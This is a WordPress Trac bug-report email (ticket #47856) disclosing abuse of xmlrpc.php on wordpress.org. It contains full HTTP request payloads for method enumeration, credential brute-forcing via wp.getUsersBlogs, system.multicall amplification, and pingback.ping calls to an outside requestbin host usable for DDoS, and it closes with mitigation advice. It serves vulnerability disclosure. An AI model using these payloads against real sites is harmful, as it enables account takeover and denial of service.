[wp-trac] [WordPress Trac] #47856: I found that productivity should be turned off from the beginning or minimized possible harmful functions but it still exists in wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you check the data correctly, you will see its search hazard.
WordPress Trac
noreply at wordpress.org
Fri Aug 9 06:43:54 UTC 2019
#47856: I found that productivity should be turned off from the beginning or
minimized possible harmful functions but it still exists in
wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
check the data correctly, you will see its search hazard.
--------------------------+-----------------------------
Reporter: victim01 | Owner: (none)
Type: defect (bug) | Status: assigned
Priority: normal | Milestone: Awaiting Review
Component: General | Version:
Severity: normal | Keywords:
Focuses: rest-api |
--------------------------+-----------------------------
## I found that productivity should be turned off from the beginning or
minimized possible harmful functions but it still exists in
wordpress.org/xmlrpc.php like Multi brute force and DDoS attack. If you
check the data correctly, you will see its search hazard.
1.First with the payload I list the available methods and can be exploited
like:
-wp.getUserBlogs
-wp.getC loại
-metaWeblog.getUsersBlogs
-system.multicall
-pingback.ping
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 141
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName> system.listMethods </methodName>
<params> </params>
</methodCall>
## Bruceforce attack
The first place I can exploit is brute force login!
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 208
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
3. Now I can easily log in with different methods by available methods,
and I can write a code to attack it with the existing user and password.
That will take a lot of time but will have results. It can happen faster
when you read my third item !!!
##DdoS attack
Method pingback.ping
The intend of Pingback is to notify a site that you link to about the link
hoping that the site you are linking to will return the favor. Some
systems automate this and maintain automated lists linking back to sites
that covered their article. In order to implement pingback, WordPress
implements an XML-RPC API function. This function will then send a request
to the site to which you would like to send a "pingback".
However, an attacker can take advantage of it to walk around DDos attacks
that affect the service.
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 249
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://requestbin.net/r/1ak1hs11</string></value>
</param><param><value><string>https://wordpress.org/news/</string>
</value></param></params>
</methodCall>
##Multicall
This increases the attack capability of methods, for example when
attacking bruteforce
The vulnerability can easily be abused by a simple script to try a
significant number of username and password combinations with a relatively
small number of HTTP requests. The following diagram shows a 4-fold
increase in login attempts to HTTP requests, but this can trivially be
expanded to a thousand logins.
POST /xmlrpc.php HTTP/1.1
Host: wordpress.org
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0)
Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 929
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name><value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>password</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
<value><struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value><array><data>
<value><array><data>
<value><string>admin</string></value>
<value><string>password</string></value>
</data></array></value>
</data></array></value>
</member>
</struct></value>
</data></array></value>
</param>
</params>
</methodCall>
What about combining it with some other way? For pingback methods, for
example. It increases time and danger !!
During testing, I was able to call the method wp.getUserBlogs 1,000 times
in a single HTTP request (limited only by PHP memory issues). If a user
creates a simple shell loop that executes one thousand times and runs a
PHP script that crafts an HTTP request with one thousand method calls all
requiring authentication, then that user would be able to try one million
unique logins in a very short period of time.
This makes brute forcing the login very fast and can run down a pretty
large wordlist in a short period of time. Also note that the
wp.getUserBlogs method isn’t the only RPC call requiring authentication.
It’s possible to use any RPC method which requires authentication to
attempt logins and brute force the Wordpress credentials.
Damage from the above holes is the damage to the remains that need to be
patched. You can remove it if not needed. Or minimize the methods that can
cause injury as the above methods !!!
##NOTE:
+A nice stop gap to this as well, block all *.php requests in your WAF if
you can.All of our legitimate requests for WP are relative links with the
".php" chopped off. By blocking *.php at WAF we are actually blocking
99.7% of all automated scanners and botnet traffic looking for WP sites.
+Turn off some dangerous functions
##Document:
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-
vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-
wordpress-xmlrpc.html
https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-
amplification-attack/
------Thank for reading-------
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47856>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list